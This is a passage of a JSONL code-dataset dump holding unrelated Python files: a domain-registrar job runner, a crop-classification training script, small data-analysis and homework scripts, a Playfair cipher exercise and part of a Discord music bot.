backend_creator.make_job(\"dom/delete\", dom_db)\n\n\ndef send_order_reminder(act_db, dom_db):\n spool_email.spool(\"payment_reminder\", [[\"users\", {\n \"user_id\": dom_db[\"user_id\"]\n }], [\"orders\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }], [\"domains\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }]])\n return True\n\n\ndef auto_renew_domain(act_db, dom_db):\n # CODE REQUIRED\n return True\n\n\ndef send_expiry_reminder(__, dom_db):\n spool_email.spool(\"reminder\", [[\"users\", {\n \"user_id\": dom_db[\"user_id\"]\n }], [\"domains\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }]])\n return True\n\n\ndef delete_action(act_db):\n return sql.sql_delete_one(\"actions\", {\"action_id\": act_db[\"action_id\"]})\n\n\naction_exec = {\n \"dom/delete\": delete_domain,\n \"dom/expired\": flag_expired_domain,\n \"dom/auto-renew\": auto_renew_domain,\n 
\"dom/reminder\": send_expiry_reminder,\n \"order/reminder\": send_order_reminder,\n \"order/cancel\": order_cancel\n}\n\n\ndef runner():\n ok, act_data = sql.sql_select(\"actions\", \"execute_dt < now()\", limit=1, order_by=\"execute_dt\")\n if not ok or not act_data or len(act_data) < 1:\n return False\n\n act_db = act_data[0]\n if act_db[\"action\"] not in action_exec:\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{act_db['domain_id']} - action not found\")\n return delete_action(act_db)\n\n ok, dom_db = sql.sql_select_one(\"domains\", {\"domain_id\": act_db[\"domain_id\"]})\n if not ok or len(dom_db) < 1:\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{act_db['domain_id']} - domain not found\")\n return delete_action(act_db)\n\n if not action_exec[act_db[\"action\"]](act_db, dom_db):\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{dom_db['domain_id']} - action failed\")\n\n event_log(f\"Domain action '{act_db['action']}' for DOM-{dom_db['domain_id']} - action done\", act_db)\n return delete_action(act_db)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='EPP Jobs Runner')\n parser.add_argument(\"-D\", '--debug', action=\"store_true\")\n parser.add_argument(\"-a\", '--action')\n parser.add_argument(\"-d\", '--domain')\n args = parser.parse_args()\n log_init(with_debug=(args.debug or args.action or args.domain))\n\n sql.connect(\"engine\")\n pdns.start_up()\n registry.start_up()\n\n if args.action and args.domain:\n ok, dom_db = sql.sql_select_one(\"domains\", {\"name\": args.domain})\n if not ok or len(dom_db) <= 0:\n debug(f\"ERROR: {args.domain} not found\")\n sys.exit(1)\n\n if args.action not in action_exec:\n debug(f\"ERROR: action '{args.action}' not possible\")\n sys.exit(1)\n\n act_db = {\"domain_id\": dom_db[\"domain_id\"], \"execute_dt\": misc.now(), \"action\": args.action}\n print(\">>>> RUNNING\", args.action, \"on\", dom_db[\"name\"])\n print(\">>>> ACTION\", action_exec[args.action](act_db, dom_db))\n sys.exit(0)\n\n debug(\"RUNNING\")\n while runner():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"james-stevens/pyrar","sub_path":"python/actions/run_actions.py","file_name":"run_actions.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"33"} +{"seq_id":"30275657576","text":"#!/usr/bin/env python3\n\nimport sys\n\nfilename = sys.argv[1]\nqueryString = sys.argv[2]\n\nsavedText = []\n\nprintSwitch = False\n\nwith open(filename, 'r') as infile:\n for line in infile:\n if line.startswith('>'):\n if queryString in line:\n printSwitch = True\n else:\n printSwitch = False\n if printSwitch:\n savedText.append(line)\n\nprint(''.join(savedText))\n","repo_name":"cory-weller/long-read-yeast-genomes","sub_path":"src/extract_contig.py","file_name":"extract_contig.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34277503322","text":"from data import BavarianCrops, BreizhCrops, SustainbenchCrops, ModisCDL\nfrom torch.utils.data import DataLoader\nfrom earlyrnn import EarlyRNN\nimport torch\nfrom tqdm import tqdm\nfrom loss import EarlyRewardLoss\nimport numpy as np\nfrom utils import VisdomLogger\nimport sklearn.metrics\nimport pandas as pd\nimport argparse\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run ELECTS Early Classification training on the BavarianCrops dataset.')\n 
parser.add_argument('--dataset', type=str, default=\"bavariancrops\", choices=[\"bavariancrops\",\"breizhcrops\", \"ghana\", \"southsudan\",\"unitedstates\"], help=\"dataset\")\n parser.add_argument('--alpha', type=float, default=0.5, help=\"trade-off parameter of earliness and accuracy (eq 6): \"\n \"1=full weight on accuracy; 0=full weight on earliness\")\n parser.add_argument('--epsilon', type=float, default=10, help=\"additive smoothing parameter that helps the \"\n \"model recover from too early classificaitons (eq 7)\")\n parser.add_argument('--learning-rate', type=float, default=1e-3, help=\"Optimizer learning rate\")\n parser.add_argument('--weight-decay', type=float, default=0, help=\"weight_decay\")\n parser.add_argument('--patience', type=int, default=30, help=\"Early stopping patience\")\n parser.add_argument('--device', type=str, default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n choices=[\"cuda\", \"cpu\"], help=\"'cuda' (GPU) or 'cpu' device to run the code. \"\n \"defaults to 'cuda' if GPU is available, otherwise 'cpu'\")\n parser.add_argument('--epochs', type=int, default=100, help=\"number of training epochs\")\n parser.add_argument('--sequencelength', type=int, default=70, help=\"sequencelength of the time series. If samples are shorter, \"\n \"they are zero-padded until this length; \"\n \"if samples are longer, they will be undersampled\")\n parser.add_argument('--batchsize', type=int, default=256, help=\"number of samples per batch\")\n parser.add_argument('--dataroot', type=str, default=os.path.join(os.environ[\"HOME\"],\"elects_data\"), help=\"directory to download the \"\n \"BavarianCrops dataset (400MB).\"\n \"Defaults to home directory.\")\n parser.add_argument('--snapshot', type=str, default=\"snapshots/model.pth\",\n help=\"pytorch state dict snapshot file\")\n parser.add_argument('--resume', action='store_true')\n\n\n args = parser.parse_args()\n\n if args.patience < 0:\n args.patience = None\n\n return args\n\ndef main(args):\n\n if args.dataset == \"bavariancrops\":\n dataroot = os.path.join(args.dataroot,\"bavariancrops\")\n nclasses = 7\n input_dim = 13\n class_weights = None\n train_ds = BavarianCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = BavarianCrops(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset == \"unitedstates\":\n args.dataroot = \"/data/modiscdl/\"\n args.sequencelength = 24\n dataroot = args.dataroot\n nclasses = 8\n input_dim = 1\n train_ds = ModisCDL(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = ModisCDL(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset == \"breizhcrops\":\n dataroot = os.path.join(args.dataroot,\"breizhcrops\")\n nclasses = 9\n input_dim = 13\n train_ds = BreizhCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = BreizhCrops(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset in [\"ghana\"]:\n use_s2_only = False\n average_pixel = False\n max_n_pixels = 50\n dataroot = args.dataroot\n nclasses = 4\n input_dim = 12 if use_s2_only else 19 # 12 sentinel 2 + 3 x sentinel 1 + 4 * planet\n args.epochs = 500\n args.sequencelength = 365\n train_ds = SustainbenchCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength,\n country=\"ghana\",\n use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n val_ds = 
SustainbenchCrops(root=dataroot,partition=\"val\", sequencelength=args.sequencelength,\n country=\"ghana\", use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n\n train_ds = torch.utils.data.ConcatDataset([train_ds, val_ds])\n\n test_ds = SustainbenchCrops(root=dataroot,partition=\"test\", sequencelength=args.sequencelength,\n country=\"ghana\", use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n elif args.dataset in [\"southsudan\"]:\n use_s2_only = False\n dataroot = args.dataroot\n nclasses = 4\n args.sequencelength = 365\n input_dim = 12 if use_s2_only else 19 # 12 sentinel 2 + 3 x sentinel 1 + 4 * planet\n args.epochs = 500\n train_ds = SustainbenchCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength, country=\"southsudan\", use_s2_only=use_s2_only)\n val_ds = SustainbenchCrops(root=dataroot,partition=\"val\", sequencelength=args.sequencelength, country=\"southsudan\", use_s2_only=use_s2_only)\n\n train_ds = torch.utils.data.ConcatDataset([train_ds, val_ds])\n test_ds = SustainbenchCrops(root=dataroot, partition=\"val\", sequencelength=args.sequencelength,\n country=\"southsudan\", use_s2_only=use_s2_only)\n\n else:\n raise ValueError(f\"dataset {args.dataset} not recognized\")\n\n traindataloader = DataLoader(\n train_ds,\n batch_size=args.batchsize)\n testdataloader = DataLoader(\n test_ds,\n batch_size=args.batchsize)\n\n model = EarlyRNN(nclasses=nclasses, input_dim=input_dim).to(args.device)\n\n\n #optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate, weight_decay=args.weight_decay)\n\n # exclude decision head linear bias from weight decay\n decay, no_decay = list(), list()\n for name, param in model.named_parameters():\n if name == \"stopping_decision_head.projection.0.bias\":\n no_decay.append(param)\n else:\n decay.append(param)\n\n optimizer = torch.optim.AdamW([{'params': no_decay, 'weight_decay': 0, \"lr\": args.learning_rate}, {'params': decay}],\n lr=args.learning_rate, weight_decay=args.weight_decay)\n\n criterion = EarlyRewardLoss(alpha=args.alpha, epsilon=args.epsilon)\n\n if args.resume and os.path.exists(args.snapshot):\n model.load_state_dict(torch.load(args.snapshot, map_location=args.device))\n optimizer_snapshot = os.path.join(os.path.dirname(args.snapshot),\n os.path.basename(args.snapshot).replace(\".pth\", \"_optimizer.pth\")\n )\n optimizer.load_state_dict(torch.load(optimizer_snapshot, map_location=args.device))\n df = pd.read_csv(args.snapshot + \".csv\")\n train_stats = df.to_dict(\"records\")\n start_epoch = train_stats[-1][\"epoch\"]\n print(f\"resuming from {args.snapshot} epoch {start_epoch}\")\n else:\n train_stats = []\n start_epoch = 1\n visdom_logger = VisdomLogger()\n\n not_improved = 0\n with tqdm(range(start_epoch, args.epochs + 1)) as pbar:\n for epoch in pbar:\n trainloss = train_epoch(model, traindataloader, optimizer, criterion, device=args.device)\n testloss, stats = test_epoch(model, testdataloader, criterion, args.device)\n\n # statistic logging and visualization...\n precision, recall, fscore, support = sklearn.metrics.precision_recall_fscore_support(\n y_pred=stats[\"predictions_at_t_stop\"][:, 0], y_true=stats[\"targets\"][:, 0], average=\"macro\",\n zero_division=0)\n accuracy = sklearn.metrics.accuracy_score(\n y_pred=stats[\"predictions_at_t_stop\"][:, 0], y_true=stats[\"targets\"][:, 0])\n kappa = sklearn.metrics.cohen_kappa_score(\n stats[\"predictions_at_t_stop\"][:, 0], stats[\"targets\"][:, 0])\n\n classification_loss = 
stats[\"classification_loss\"].mean()\n earliness_reward = stats[\"earliness_reward\"].mean()\n earliness = 1 - (stats[\"t_stop\"].mean() / (args.sequencelength - 1))\n\n stats[\"confusion_matrix\"] = sklearn.metrics.confusion_matrix(y_pred=stats[\"predictions_at_t_stop\"][:, 0],\n y_true=stats[\"targets\"][:, 0])\n\n train_stats.append(\n dict(\n epoch=epoch,\n trainloss=trainloss,\n testloss=testloss,\n accuracy=accuracy,\n precision=precision,\n recall=recall,\n fscore=fscore,\n kappa=kappa,\n earliness=earliness,\n classification_loss=classification_loss,\n earliness_reward=earliness_reward\n )\n )\n\n visdom_logger(stats)\n visdom_logger.plot_boxplot(stats[\"targets\"][:, 0], stats[\"t_stop\"][:, 0], tmin=0, tmax=args.sequencelength)\n df = pd.DataFrame(train_stats).set_index(\"epoch\")\n visdom_logger.plot_epochs(df[[\"precision\", \"recall\", \"fscore\", \"kappa\"]], name=\"accuracy metrics\")\n visdom_logger.plot_epochs(df[[\"trainloss\", \"testloss\"]], name=\"losses\")\n visdom_logger.plot_epochs(df[[\"accuracy\", \"earliness\"]], name=\"accuracy, earliness\")\n visdom_logger.plot_epochs(df[[\"classification_loss\", \"earliness_reward\"]], name=\"loss components\")\n\n savemsg = \"\"\n if len(df) > 2:\n if testloss < df.testloss[:-1].values.min():\n savemsg = f\"saving model to {args.snapshot}\"\n os.makedirs(os.path.dirname(args.snapshot), exist_ok=True)\n torch.save(model.state_dict(), args.snapshot)\n\n optimizer_snapshot = os.path.join(os.path.dirname(args.snapshot),\n os.path.basename(args.snapshot).replace(\".pth\", \"_optimizer.pth\")\n )\n torch.save(optimizer.state_dict(), optimizer_snapshot)\n\n df.to_csv(args.snapshot + \".csv\")\n not_improved = 0 # reset early stopping counter\n else:\n not_improved += 1 # increment early stopping counter\n if args.patience is not None:\n savemsg = f\"early stopping in {args.patience - not_improved} epochs.\"\n else:\n savemsg = \"\"\n\n pbar.set_description(f\"epoch {epoch}: trainloss {trainloss:.2f}, testloss {testloss:.2f}, \"\n f\"accuracy {accuracy:.2f}, earliness {earliness:.2f}. \"\n f\"classification loss {classification_loss:.2f}, earliness reward {earliness_reward:.2f}. {savemsg}\")\n\n if args.patience is not None:\n if not_improved > args.patience:\n print(f\"stopping training. 
testloss {testloss:.2f} did not improve in {args.patience} epochs.\")\n break\n\ndef train_epoch(model, dataloader, optimizer, criterion, device):\n losses = []\n model.train()\n for batch in dataloader:\n optimizer.zero_grad()\n X, y_true = batch\n X, y_true = X.to(device), y_true.to(device)\n log_class_probabilities, probability_stopping = model(X)\n\n loss = criterion(log_class_probabilities, probability_stopping, y_true)\n\n #assert not loss.isnan().any()\n if not loss.isnan().any():\n loss.backward()\n optimizer.step()\n\n losses.append(loss.cpu().detach().numpy())\n\n return np.stack(losses).mean()\n\ndef test_epoch(model, dataloader, criterion, device):\n model.eval()\n\n stats = []\n losses = []\n for batch in dataloader:\n X, y_true = batch\n X, y_true = X.to(device), y_true.to(device)\n\n log_class_probabilities, probability_stopping, predictions_at_t_stop, t_stop = model.predict(X)\n loss, stat = criterion(log_class_probabilities, probability_stopping, y_true, return_stats=True)\n\n stat[\"loss\"] = loss.cpu().detach().numpy()\n stat[\"probability_stopping\"] = probability_stopping.cpu().detach().numpy()\n stat[\"class_probabilities\"] = log_class_probabilities.exp().cpu().detach().numpy()\n stat[\"predictions_at_t_stop\"] = predictions_at_t_stop.unsqueeze(-1).cpu().detach().numpy()\n stat[\"t_stop\"] = t_stop.unsqueeze(-1).cpu().detach().numpy()\n stat[\"targets\"] = y_true.cpu().detach().numpy()\n\n stats.append(stat)\n\n losses.append(loss.cpu().detach().numpy())\n\n # list of dicts to dict of lists\n stats = {k: np.vstack([dic[k] for dic in stats]) for k in stats[0]}\n\n return np.stack(losses).mean(), stats\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"MarcCoru/elects","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"33"} +{"seq_id":"10088899409","text":"import pandas as pd\r\nimport numpy as np\r\nimport collections\r\ndata = {\r\n 'customer_ID': [12, 23, 34, 45, 56, 67, 78, 89],\r\n 'customer_age': [30, 25, 28, 32, 22, 20, 30, 25]\r\n}\r\ndf = pd.DataFrame(data)\r\nage = df['customer_age']\r\nage_frequency = collections.Counter(age)\r\nprint(age_frequency)\r\n","repo_name":"ashik0072/ASHIK-fundamentals_of_datascience","sub_path":"p14.frequency distribution.py","file_name":"p14.frequency distribution.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"23238472137","text":"import jieba\ns = '陈海升(队长)(2015034643038):代码测试员。风格多变,擅长多种语言的”helloworld“编程,兴趣是下一门语言的“helloworld”。宣言是:学习没有期限,如果有,那就把它删掉。'\ns1='艾晓晗(2015034643010):项目经理。风格俏皮可爱,擅长统筹规划,兴趣广泛。宣言是:好好学习。'\ns2='詹振根(2015034643021):代码编写员。风格哲学,擅长在团队项目中carry,当大哥。对哲学和python很有兴趣。 宣言是:python python Michael Jackson。'\ns3='黄志明(2015034643001):ui设计。风格随性自然,擅长matlab;对数据挖掘、matlab很有兴趣。宣言是:做平凡的事,当不平凡的人。'\nm=s+s1+s2+s3\ncut = jieba.cut(m)\nfrom collections import Counter\nc = Counter(cut)\nl3=' ,。、?》《;:‘“’”、|】}【{,./<>?:\"\\|[]{}-=_+)(*&^%$#@!~`'\nfor key,value in list(c.items()):\n a1=key\n b1=l3.find(a1)\n c1=value\n if b1!=-1:\n del c[key]\n if c1==1:\n del c[key]\nprint(c)\nl1=[]\nl2=[]\nfor key,value in c.items():\n l1.append(key)\n l2.append(value)\nfrom pylab import mpl\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nimport matplotlib.pyplot as plt\nplt.bar(l1,l2)\nplt.show()\nimport numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfig = 
plt.figure()\nplt.pie(l2, labels=l1, autopct='%1.2f%%')\nplt.show()","repo_name":"lkdgn/python1","sub_path":"python作业/ljb.py","file_name":"ljb.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34634003556","text":"# Morgan Wilkinson\n# 07/22/2019\n\n# SavingWeb - This program downloads files from the web using the request module.\n\nimport requests\n\nres = requests.get(\"https://creativenovels.com/73/chapter-120-are-you-expecting/\")\ntry:\n\tres.raise_for_status()\nexcept Exception as exc:\n\tprint(\"Fatal Error: %s\" % (exc))\n\nplayFile = open(\"Test.html\", 'wb')\nfor chunk in res.iter_content(100000):\n\tplayFile.write(chunk)\n\nplayFile.close()","repo_name":"Morgan-Wilkinson/Python-Small-Projects","sub_path":"SavingWeb.py","file_name":"SavingWeb.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"41579626601","text":"class User:\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.account_balance = 0\n\n def make_deposit(self, amount):\n self.account_balance += amount\n return self\n\n def make_withdrawal (self, amount):\n if self.account_balance >= amount:\n self.account_balance -= amount\n else:\n print(\"Saldo insuficiente\")\n return self\n def display_user_balance(self):\n print(self.name, self.account_balance)\n return self\n #return self\n\n\n\n#Instancia de Objeto\nguido = User(\"Guido Van Rossum\", \"guido@python.com\")\nmonty = User(\"Monty Python\", \"monty@python.com\")\nroro = User(\"Rodrigo Salas\", \"salas@python.com\")\n\n# guido.make_deposit(100)\n# guido.make_deposit(200)\n# guido.make_deposit(200)\n# guido.make_withdrawal(100)\n# print(guido.display_user_balance())\n\nprint('Métodos encadenados')\n\nguido.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\nprint()\nmonty.make_deposit(200).make_deposit(100).make_withdrawal(100).display_user_balance()\nprint()\nroro.make_deposit(200).make_withdrawal(100).make_withdrawal(50).display_user_balance()","repo_name":"Carlos-maldonado578/full_stack_python","sub_path":"python/OOP/Usuario.py","file_name":"Usuario.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71707389535","text":"import logging, BigWorld\nfrom dossiers2.custom.records import DB_ID_TO_RECORD as ID2NAME\nlogger = logging.getLogger(__name__)\n\nclass VehicleAchievementsComponent(BigWorld.DynamicScriptComponent):\n\n def __init__(self):\n super(VehicleAchievementsComponent, self).__init__()\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] VehicleAchievementsComponent has been initialized')\n\n def setSlice_achievements(self, changePath, oldValue):\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] self.setSlice_achievements: achievements: %s, changePath: %s', self.achievements, changePath)\n startIndex, endIndex = changePath[(-1)]\n receivedAchievements = self.achievements[startIndex:endIndex]\n revokedAchievements = oldValue\n logger.debug('[IN_BATTLE_ACHIEVEMENTS] Received: %s - Revoked: %s', (', ').join([ ID2NAME[item][1] for item in receivedAchievements if item in ID2NAME.iterkeys() ]), (', ').join([ ID2NAME[item][1] for item in revokedAchievements if item in ID2NAME.iterkeys() 
]))","repo_name":"IzeBerg/wot-src","sub_path":"sources/res/in_battle_achievements/scripts/client/VehicleAchievementsComponent.py","file_name":"VehicleAchievementsComponent.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"33"} +{"seq_id":"21552121992","text":"#\n# CS 196 Data Hackerspace\n# Assignment 1: Data Parsing and NumPy\n# Due September 24th, 2018\n#\n\nimport json\nimport csv\nimport numpy as np\nimport re\n\ndef histogram_times(filename):\n\tf = open(filename)\n\tcsv_file = csv.reader(f)\n\tcrashes_per_hour = []\n\tfor row in csv_file:\n\t\tif row[1] != \"\" and row[1] != \"Time\":\n \t\t\tcrashes_per_hour.append(row[1][:2])\n\tcrashes = []\n\tfor x in range(24):\n\t\ty = \"%02d\" % x\n\t\ti = 0\n\t\tfor time in crashes_per_hour:\n\t\t\tif y == time:\n\t\t\t\ti += 1\n\t\tcrashes.append(i)\n\treturn crashes\n\n\ndef weigh_pokemons(filename, weight):\n\twith open(filename) as json_file: \n\t\tdata = json.load(json_file)\n\treturnList = []\n\tfor p in data['pokemon']:\n\t\tweight1 = re.findall(\"[+-]?\\d+\\.\\d+\", p['weight'])\n\t\tweight12 = weight1[0]\t\n\t\tif weight12 == weight:\n\t\t\treturnList.append(p['name'])\n\treturn returnList\n \n\ndef single_type_candy_count(filename):\n\twith open(filename) as json_file: \n\t\tdata = json.load(json_file)\n\tcandyCount = 0\n\tfor p in data['pokemon']:\n\t\tif len(p['type']) == 1:\n\t\t\tif 'candy_count' in p:\n\t\t\t\tcandyCount += p['candy_count']\n\treturn candyCount\n\ndef reflections_and_projections(points):\n\tpointsFloat = points.astype(float)\n\tpoints1 = np.flip(pointsFloat,0)\n\tcols = points1.shape[1]\n\tprint(points1)\n\trotate90 = np.array([[0, -1],[1, 0]])\n\tfor y in range(0, cols):\n\t\tflippedCordinate = np.array([[points1[0,y]],[points1[1,y]]])\n\t\tflippedRotated = np.matmul(rotate90, flippedCordinate)\n\t\tpoints1[0,y] = flippedRotated[0,0]\n\t\tpoints1[1,y] = flippedRotated[1,0]\n\t\tprojection = np.array([[1,3],[3,9]])\n\t\trotatedCord = np.array([[points1[0,y]],[points1[1,y]]])\n\t\tprojected = (np.matmul(projection, rotatedCord))\n\t\tpoints1[0,y] = .1*projected[0,0]\n\t\tpoints1[1,y] = .1*projected[1,0]\n\tprint(points1)\n\n\ndef normalize(image):\n\timage *= 255\n\timage = image/(np.max(image)-np.min(image))\n\timage *= (image - np.min(image))\n\treturn image\n\ndef sigmoid_normalize(image, a):\n image = image/(1+(1/(1 / np.exp((1 / a)+image - 128))))\n image *= 255\n print(image)\n\n\n\n","repo_name":"vitan12/Data_Hackerspace_Homework","sub_path":"Homework 1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14095810516","text":"import math\nimport pdb\n\nclass Quad:\n\n def __init__(self, x, y, z):\n self.a = x\n self.b = y\n self.c = z\n\n def solve(self):\n d = (self.b ** 2) - (4 * self.a * self.c)\n if d > 0:\n disc = math.sqrt(d)\n root1 = (-self.b + disc)/(2*self.a)\n root2 = (-self.b - disc) /(2*self.a)\n return root1, root2\n elif d == 0:\n return -self.b / 2 * self.a\n else:\n return \"This equation has no roots\"\n\nprint(__name__)\nif __name__ == '__main__':\n while True:\n a = int(input(\"Enter the value of a: \"))\n b = int(input(\"Enter the value of b: \"))\n c = int(input(\"Enter the value of c: \"))\n if a == -1:\n print(\"Exiting\")\n break\n #pdb.set_trace()\n #breakpoint()\n solver = Quad(a, b, c)\n roots = solver.solve()\n 
print(roots)\n\n","repo_name":"saurabht85/python_django_0622","sub_path":"Module5/debugging.py","file_name":"debugging.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"8071991634","text":"# Abi Rahmawan\r\n# V3921001\r\n# TI-D \r\n\r\nkey=input(\"MASUKKAN KUNCI : \") # memassukkan kunci\r\nprint(\"================================\")\r\nkey=key.replace(\" \", \"\") # menghilangkan spasi\r\nkey=key.upper() # merubah ke dalam huruf kapital\r\n\r\n# membuat fungsi matrix\r\ndef matrix(x,y,initial):\r\n return [[initial for i in range(x)] for j in range(y)]\r\n \r\nresult=list()\r\nfor c in key: # menyimpan kunci\r\n if c not in result:\r\n if c=='J': # mengecualikan huruf J\r\n result.append('I')\r\n else:\r\n result.append(c)\r\nflag=0\r\nfor i in range(65,91): # menyimpan karakter lain\r\n if chr(i) not in result:\r\n if i==73 and chr(74) not in result:\r\n result.append(\"I\")\r\n flag=1\r\n elif flag==0 and i==73 or i==74:\r\n pass \r\n else:\r\n result.append(chr(i))\r\nk=0\r\nmy_matrix=matrix(5,5,0) # inisialisasi matriks\r\nfor i in range(0,5): # membuat matriks\r\n for j in range(0,5):\r\n my_matrix[i][j]=result[k]\r\n k+=1\r\n\r\n# membuat fungsi untuk mendapatkan lokasi setiap karakter\r\ndef locindex(c): \r\n loc=list()\r\n if c=='J': # mengecualikan huruf J\r\n c='I'\r\n for i ,j in enumerate(my_matrix):\r\n for k,l in enumerate(j):\r\n if c==l:\r\n loc.append(i)\r\n loc.append(k)\r\n return loc\r\n\r\n# Enkripsi \r\ndef enkripsi(): \r\n msg=str(input(\"MASUKKAN KATA: \"))\r\n msg=msg.upper()\r\n msg=msg.replace(\" \", \"\") \r\n i=0\r\n for s in range(0,len(msg)+1,2):\r\n if s str:\n return f'{self.progress}/{self.duration}'\n\n @property\n def progress(self) -> Time:\n delta = datetime.now() - self.start_time\n delta = delta.total_seconds() + self.delta\n return Time(delta)\n\n @property\n def links(self):\n if self.type == 'file':\n links = f'[Url]({self.url})'\n else:\n links = []\n if self.yturl:\n links.append(f'[YouTube]({self.yturl})')\n if self.spurl:\n links.append(f'[Spotify]({self.spurl})')\n links = ' | '.join(links)\n return links if links else None\n\n @property\n def link(self) -> str:\n if self.yturl:\n return self.yturl\n elif self.spurl:\n return self.spurl\n else:\n return self.url\n\n def extract_url(self):\n from .search import ytdl, Youtube\n if self.url:\n pass\n elif self.type == 'file':\n pass\n elif self.type == 'spotify':\n data = ytdl.extract_info(self.title, download=False, process=True)\n self.yturl = data['entries'][0]['webpage_url']\n self.url = data['entries'][0]['url']\n elif self.type == 'youtube':\n data = ytdl.extract_info(self.yturl, download=False, process=False)\n self.url = Youtube.get_url_from_formats(data['formats'])\n\n def extract_source(self) -> discord.FFmpegPCMAudio:\n from .search import FFMPEG_OPTIONS\n if self.source:\n source = self.source\n self.source = None\n else:\n if not self.url:\n self.extract_url()\n source = discord.FFmpegPCMAudio(self.url, **FFMPEG_OPTIONS)\n return source\n\n\n@dataclass\nclass ServerMusic:\n \"\"\"Container for managing music in a server.\n\n Attributes\n -----------\n queue: List[:class:`Song`]\n The song queue.\n vc: :class:`discord.VoiceClient`\n The voice client of the server.\n is_playing: :class:`bool`\n Playing status.\n current_song: :class:`Song`\n The currently playing song.\n queue_msg: Dict[:class:`int`,:class:`discord.Message`]\n The queue messages in the server.\n now_playing: 
:class:`discord.Message`\n The now playing message.\n \"\"\"\n queue: list[Song] = field(default_factory=list)\n vc: discord.VoiceClient = None\n is_playing: bool = False\n current_song: Song | None = None\n queue_msg: dict[int, discord.Message] = field(default_factory=dict)\n now_playing: discord.Message = None\n\n def __len__(self):\n return len(self.queue)\n\n def clear(self):\n self.queue.clear()\n\n def shuffle(self):\n np.random.shuffle(self.queue)\n\n def remove(self, pos: int):\n del self.queue[pos]\n\n def move(self, _from: int, _to: int):\n self.queue.insert(_to, self.queue.pop(_from))\n\n def swap(self, pos1: int, pos2: int):\n self.queue[pos1], self.queue[pos2] = self.queue[pos2], self.queue[pos1]\n\n def reverse(self):\n self.queue.reverse()\n\n\nclass QueueEmbed:\n def __init__(self,\n server_music: ServerMusic,\n page: int,\n per_page: int = 10) -> None:\n self.view: View = self.create_view()\n self.server_music = server_music\n self.page = page\n self.per_page = per_page\n\n def add(self, add: int):\n self.page += add\n\n def set(self, value: int):\n self.page = value\n\n def create_view(self) -> View:\n button_first = Button(label='<<')\n button_backward = Button(label='<')\n button_forward = Button(label='>')\n button_last = Button(label='>>')\n\n async def first_callback(interaction: discord.Interaction):\n self.set(10**10)\n await interaction.response.edit_message(embed=self.embed)\n\n async def backward_callback(interaction: discord.Interaction):\n self.add(-1)\n await interaction.response.edit_message(embed=self.embed)\n\n async def forward_callback(interaction: discord.Interaction):\n self.add(1)\n await interaction.response.edit_message(embed=self.embed)\n\n async def last_callback(interaction: discord.Interaction):\n self.set(0)\n await interaction.response.edit_message(embed=self.embed)\n\n button_first.callback = first_callback\n button_backward.callback = backward_callback\n button_forward.callback = forward_callback\n button_last.callback = last_callback\n view = View()\n view.add_item(button_first)\n view.add_item(button_backward)\n view.add_item(button_forward)\n view.add_item(button_last)\n return view\n\n @property\n def embed(self) -> discord.Embed:\n queue_len = len(self.server_music.queue)\n page_len = int(np.ceil(queue_len/self.per_page))\n # loop page\n self.page = page_len if self.page < 1 else self.page\n self.page = 1 if self.page > page_len else self.page\n # cut the queue\n lower_bound = (self.page - 1) * self.per_page\n upper_bound = (self.page) * self.per_page\n if self.page == page_len: # last page\n songs = self.server_music.queue[lower_bound:]\n else:\n songs = self.server_music.queue[lower_bound:upper_bound]\n # generate text\n first_num = ((self.page - 1) * self.per_page) 